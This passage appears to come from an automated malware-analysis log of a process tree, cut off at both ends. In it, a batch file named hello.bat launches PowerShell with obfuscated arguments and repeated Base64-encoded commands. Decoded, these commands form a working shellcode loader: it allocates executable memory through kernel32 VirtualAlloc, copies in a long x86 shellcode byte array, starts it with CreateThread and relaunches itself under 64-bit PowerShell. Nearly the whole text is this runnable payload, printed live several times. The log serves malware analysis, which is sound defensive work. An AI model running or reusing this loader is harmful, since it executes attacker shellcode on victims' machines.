BpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:5880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ijktea10\ijktea10.cmdline"
5⤵
PID:6784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C7C.tmp" "c:\Users\Admin\AppData\Local\Temp\ijktea10\CSCF33F267F7A0A4DC995C5BE35FED6687.TMP"
6⤵
PID:6172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\hello.bat"
1⤵
PID:4512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABl